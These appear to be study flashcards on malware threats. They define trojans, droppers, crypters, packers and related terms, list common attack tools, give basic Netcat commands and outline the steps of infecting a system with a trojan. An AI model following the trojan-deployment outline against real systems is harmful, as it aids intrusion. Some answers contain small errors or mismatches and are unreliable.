Module 07: Malware Threats

Question 1

Malware

Answer 1

Malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for the purpose of theft or fraud.

How It Works: Malware is often distributed via infected files, email attachments, or malicious links.

Common Tools: Metasploit, Cobalt Strike, and custom scripts.

Question 2

Viruses

Answer 2

Malware that attaches itself to files or programs and spreads when infected files are executed.

Question 3

Worms

Answer 3

Autonomous malware that self-replicates and spreads on its own across networks without needing host files.

Question 4

APT

Answer 4

Advanced Persistent Threat, a long-term, stealthy attack campaign, usually by a group, aimed at stealing data or gaining ongoing access to a network.

How It Works: APTs often use multiple stages—initial infiltration, lateral movement, and persistence—while evading detection.
Common Tools: Cobalt Strike, Mimikatz, and custom malware tailored for persistence.

Question 5

Trojans

Answer 5

Malware disguised as legitimate software that, once executed, provides unauthorized access or control to an attacker.

How It Works: Users unknowingly download and run trojans, which may install backdoors or steal data.
Common Tools: Remote Access Trojans (RATs) like NanoCore, njRAT, Beast proejct, and DarkComet.

Question 6

Fileless malware

Answer 6

Malware that doesn’t write files to disk, instead running in memory to avoid detection by traditional antivirus software.

How It Works: Often exploits legitimate processes (like PowerShell or WMI) to execute code directly in RAM.

Common Tools: PowerShell Empire, Cobalt Strike, and techniques like Living Off the Land (LOLBins).

Question 7

Crypters

Answer 7

A tool used to encrypt malware code to evade detection by antivirus software, often by altering the code’s appearance without changing its function. Secures and hides code.

Question 8

Downloader

Answer 8

A small piece of malware that connects to a remote server to download additional malicious components or updates once the initial infection is successful.

Question 9

Dropper

Answer 9

A type of malware that installs and deploys other malicious files onto the infected system, often used to deliver trojans or ransomware.

Question 10

Exploit

Answer 10

Code that takes advantage of a specific vulnerability in software or the OS to gain unauthorized access or escalate privileges.

Question 11

Injector

Answer 11

Injects malicious code into legitimate processes running on the system, allowing the malware to hide within trusted applications and evade detection.

Question 12

Obfuscator

Answer 12

Alters the malware’s code to make it harder to analyze, often by renaming functions or adding confusing, unused code sequences.

Question 13

Packer

Answer 13

Compresses and encrypts malware into a single executable to avoid detection, only unpacking itself in memory when executed.

Question 14

Payload

Answer 14

The part of malware that performs the malicious activity, such as stealing data, encrypting files, or controlling the infected system.

Question 15

Malicious code

Answer 15

Any code within the malware designed to harm, steal, or control, encompassing everything from payloads to self-replication functions.

Question 16

PUA

Answer 16

Potentially Unwanted Application (PUAs) are potentially harmful applications that may pose severe risks to the security and privacy of data stored in the system where they’re installed (junkware).

Question 17

How do you infect a system using a trojan?

Answer 17

1. Create a new Trojan packet
2. Employ a dropper or downloader to install the malicious code on the target system
3. Employ a wrapper to bind the Trojan to a legitimate file
4. Employ a crypter to encrypt the Trojan
5. Propagate the Trojan by various methods - links, send out .exe as an email back in the day
6. Deploy the Trojan on the victim’s machine by executing the dropper or downloader on the target machine, through covert channels (often encrypted)
7. Execute the damage routine

Question 18

Sheep dipping

Answer 18

Sheep dipping refers to the analysis of suspect files, incoming messages etc. for malware. Also can be known as sandboxing. A sheep dip computer used to be a staging area for physical media.

Question 19

Malware analysis

Answer 19

Malware analysis is a process of reverse engineering a specific piece of malware to determine the origin, functionality, and potential impact

Question 20

Static vs dynamic code analysis

Answer 20

Static Code Analysis: Examines the code without running it, looking for vulnerabilities or malicious patterns by analyzing the code structure, syntax, and logic. This is like reading a recipe to spot mistakes before cooking.

Dynamic Code Analysis: Tests the code while it’s running to observe its actual behavior in real time, checking for unexpected actions, such as modifying files or network activity. This is like tasting the dish while cooking to see how it actually turns out.

Question 21

Netcat

Answer 21

Netcat (often called the “Swiss Army knife” of networking) is a simple command-line tool used to send and receive data over the network, allowing for network communication and port listening.

How Netcat Works
- Listener Mode: Netcat can be set to listen on a specific port, making it act as a server or “listener.” For example, running nc -l -p 1234 makes Netcat listen on port 1234, ready to receive data from any connecting device.
- Client Mode: Netcat can also connect to a listener (another Netcat instance or server) as a client. For instance, running nc <IP> 1234 connects to the listener on the specified IP and port.
- Data Transfer: Once connected, Netcat can send and receive data between client and server, allowing for tasks like file transfer, port scanning, and even remote shell access.</IP>

Use Cases
Netcat is popular for port scanning, file transfer, simple chat setup, and setting up backdoors in penetration testing because it can quickly establish connections and transfer data across systems.

Question 22

PE Explorer

Answer 22

PE Explorer is a Windows application used for analyzing and editing Portable Executable (PE) files, which are the standard executable file format in Windows (e.g., .exe, .dll files). It allows users to inspect and modify the internal structure of PE files, making it useful for software developers, reverse engineers, and malware analysts.

One of a dozen PE tools, and can identify import calls that the application pulls from the OS, and also implements the OS

Question 23

What is malware disassembly and what are common tools

Answer 23

Dynamic Malware Analysis is behavioral based, based on what it does. Look at processes executed, network connections etc. compared with a baseline.

IDA pro and Ghidra are most common tools to reverse things to assembly instructions, so these dissasemblers allow you to analyze code in disassembly language